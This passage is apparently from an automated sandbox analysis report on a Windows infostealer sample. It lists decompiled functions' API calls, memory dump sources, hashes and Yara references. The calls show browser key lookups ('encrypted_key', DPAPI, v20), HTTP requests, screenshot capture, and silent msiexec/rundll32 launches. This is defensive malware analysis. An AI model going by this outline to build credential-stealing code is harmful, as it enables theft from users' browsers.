                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E6196
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007E61B3
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6217
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6224
                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E5E5F
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • InternetCloseHandle.WININET(00000000), ref: 007E622E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                    • String ID:
                                    • API String ID: 1703137719-0
                                    • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                    • Instruction ID: 5cb8bf1880a42c76b69897584c399bfc3993bbd7389eef40dff75117fc46e0b3
                                    • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                    • Instruction Fuzzy Hash: C012CEB195021CFACB15EBA0DD99EFEB379BF14700F504199B20A62291DF742B89CF51
                                    Function 007ECBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 007ECCD3
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007ECCF0
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 007ECCFC
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007ECD0F
                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 007ECD1C
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007ECD40
                                    • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 007ECD5E
                                    • StrStrA.SHLWAPI(00000000,0064A364), ref: 007ECD85
                                    • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 007ECF09
                                    • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 007ECF20
                                      • Part of subcall function 007ECA87: memset.MSVCRT ref: 007ECABA
                                      • Part of subcall function 007ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007ECAD8
                                      • Part of subcall function 007ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007ECAE3
                                      • Part of subcall function 007ECA87: memcpy.MSVCRT(?,?,?), ref: 007ECB79
                                    • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 007ECFC1
                                    • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 007ECFD8
                                      • Part of subcall function 007ECA87: lstrcat.KERNEL32(?,00420B46), ref: 007ECBAA
                                      • Part of subcall function 007ECA87: lstrcat.KERNEL32(?,00420B47), ref: 007ECBBE
                                      • Part of subcall function 007ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 007ECBDF
                                    • lstrlen.KERNEL32(00000000), ref: 007ED0AB
                                    • CloseHandle.KERNEL32(00000000), ref: 007ED103
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                    • String ID:
                                    • API String ID: 3555725114-3916222277
                                    • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                    • Instruction ID: 4e98699142c9e6ee8c06f428794e90d2970adca8e753cd2674c861f0ebb81b59
                                    • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                    • Instruction Fuzzy Hash: 4AE1B1B591010CFBCB15EBA4DD99EFEB779AF14300F408159F20A66292DF386A49CF61
                                    Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00A196D0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                    • StrStrA.SHLWAPI(?,00A197C0,00420B52), ref: 0040CAF7
                                    • StrStrA.SHLWAPI(00000000,00A19718), ref: 0040CB1E
                                    • StrStrA.SHLWAPI(?,00A19F00,00000000,?,00421458,00000000,?,00000000,00000000,?,00A12EE0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                    • StrStrA.SHLWAPI(00000000,00A19EA0), ref: 0040CCB9
                                      • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                      • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A12E70), ref: 0040C871
                                      • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                      • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                    • StrStrA.SHLWAPI(?,00A19EA0,00000000,?,0042145C,00000000,?,00000000,00A12E70), ref: 0040CD5A
                                    • StrStrA.SHLWAPI(00000000,00A12FB0), ref: 0040CD71
                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                    • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                    • String ID:
                                    • API String ID: 3555725114-3916222277
                                    • Opcode ID: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                    • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                    • Opcode Fuzzy Hash: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                    • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                    Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,00A16A40,00000000,00020019,00000000,004205B6), ref: 004183A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                    • wsprintfA.USER32 ref: 00418459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                    • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                    • Opcode Fuzzy Hash: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                    • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                    Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • memset.MSVCRT ref: 00410C1C
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                    • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                    • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                    • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                    • lstrlenA.KERNEL32(?), ref: 00410CA7
                                    • memset.MSVCRT ref: 00410CCD
                                    • memset.MSVCRT ref: 00410CE1
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                    • String ID: .exe
                                    • API String ID: 1395395982-4119554291
                                    • Opcode ID: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                    • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                    • Opcode Fuzzy Hash: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                    • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                    Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                    • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                    • Opcode Fuzzy Hash: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                    • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                    Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtok_s.MSVCRT ref: 00411307
                                    • strtok_s.MSVCRT ref: 00411750
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strtok_s$lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 348468850-0
                                    • Opcode ID: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                    • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                    • Opcode Fuzzy Hash: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                    • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                    Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                    • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                    • Opcode Fuzzy Hash: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                    • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                    Function 007F44E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 007F4505
                                    • memset.MSVCRT ref: 007F451C
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F4553
                                    • lstrcat.KERNEL32(?,0064A30C), ref: 007F4572
                                    • lstrcat.KERNEL32(?,?), ref: 007F4586
                                    • lstrcat.KERNEL32(?,0064A5D8), ref: 007F459A
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007F8FF7: GetFileAttributesA.KERNEL32(00000000,?,007E1DBB,?,?,0042565C,?,?,00420E1F), ref: 007F9006
                                      • Part of subcall function 007E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 007E9FA0
                                      • Part of subcall function 007E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 007E9FF9
                                      • Part of subcall function 007E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                      • Part of subcall function 007E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                      • Part of subcall function 007E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                      • Part of subcall function 007E9C27: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                      • Part of subcall function 007E9C27: LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                      • Part of subcall function 007E9C27: CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                      • Part of subcall function 007F9627: GlobalAlloc.KERNEL32(00000000,007F4644,007F4644), ref: 007F963A
                                    • StrStrA.SHLWAPI(?,0064A0D8), ref: 007F465A
                                    • GlobalFree.KERNEL32(?), ref: 007F4779
                                      • Part of subcall function 007E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D56
                                      • Part of subcall function 007E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,007E5155,00000000,?), ref: 007E9D68
                                      • Part of subcall function 007E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D91
                                      • Part of subcall function 007E9D27: LocalFree.KERNEL32(?,?,?,?,007E5155,00000000,?), ref: 007E9DA6
                                      • Part of subcall function 007EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F470A
                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 007F4727
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 007F4739
                                    • lstrcat.KERNEL32(00000000,?), ref: 007F474C
                                    • lstrcat.KERNEL32(00000000,00420FB8), ref: 007F475B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 1191620704-0
                                    • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                    • Instruction ID: 3419b96c65143d9add4ebb4bd5b4fc1d9d13b96c9aa720524b66410e2a57a4ff
                                    • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                    • Instruction Fuzzy Hash: 0B7133B6900218BBDB14FBE0DC49FEE7379AF49300F008598F60596281EB79DB59CB61
                                    Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 0041429E
                                    • memset.MSVCRT ref: 004142B5
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                    • lstrcatA.KERNEL32(?,00A19220), ref: 0041430B
                                    • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                    • lstrcatA.KERNEL32(?,00A19910), ref: 00414333
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                      • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                      • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                    • StrStrA.SHLWAPI(?,00A1A768), ref: 004143F3
                                    • GlobalFree.KERNEL32(?), ref: 00414512
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                    • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                    • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
